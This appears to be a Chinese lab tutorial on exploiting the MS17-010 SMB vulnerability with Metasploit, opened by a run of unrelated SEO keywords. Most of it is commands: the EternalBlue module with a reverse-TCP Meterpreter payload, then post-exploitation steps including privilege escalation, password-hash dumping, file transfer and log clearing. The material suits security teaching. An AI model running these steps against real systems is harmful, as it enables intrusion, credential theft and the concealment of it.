网站seo排名公司,成都小程序建设乚成都柚米,济南高新区 网站建设,网站怎么做友情连接文章目录 一、利用ms17-010漏洞对靶机执行溢出攻击二、后渗透模块meterpreter的使用 一、利用ms17-010漏洞对靶机执行溢出攻击
分别输入以下命令#xff0c;使用ms17_010_eternalblue模块对目标机的ms17-010漏洞进行利用#xff1a;
use exploit/windows/smb/ms17_010_eter… 文章目录 一、利用ms17-010漏洞对靶机执行溢出攻击二、后渗透模块meterpreter的使用 一、利用ms17-010漏洞对靶机执行溢出攻击
分别输入以下命令使用ms17_010_eternalblue模块对目标机的ms17-010漏洞进行利用
use exploit/windows/smb/ms17_010_eternalblue //使用ms17_010_eternalblue模块
set RHOST [靶机IP] //设置远程主机靶机的IP地址
set LHOST [操作机IP] //设置本地主机操作机的IP地址
set payload windows/x64/meterpreter/reverse_tcp //使用payloadmeterpreter/reverse_tcp
set RPORT 445 //设置目标端口
set target 0 //设置目标操作系统类型此处为自动识别类型
run //执行溢出攻击成功后返回meterpreter提示符 常规情况下用exp攻破了系统需要与靶机进行通信以便操纵靶机一般用反弹shell这个反弹shell的代码就是payload。 二、后渗透模块meterpreter的使用
pwd //打印当前工作目录
sysinfo // 查看系统信息
getuid //获取当前权限的用户id
ps //查看当前目标机上运行的进程列表和pid
getsystem //获取system权限
screenshot //截取目标主机当前屏幕
hashdump //获取用户名与hash口令
shell //获取目标主机shell
upload //上传一个文件
download //下载一个文件
execute //执行目标系统中的文件-f指定文件-i执行可交互模式-H隐藏窗口
clearev //清除日志
background //将meterpreter放入后台使用sessions -i重新连接到会话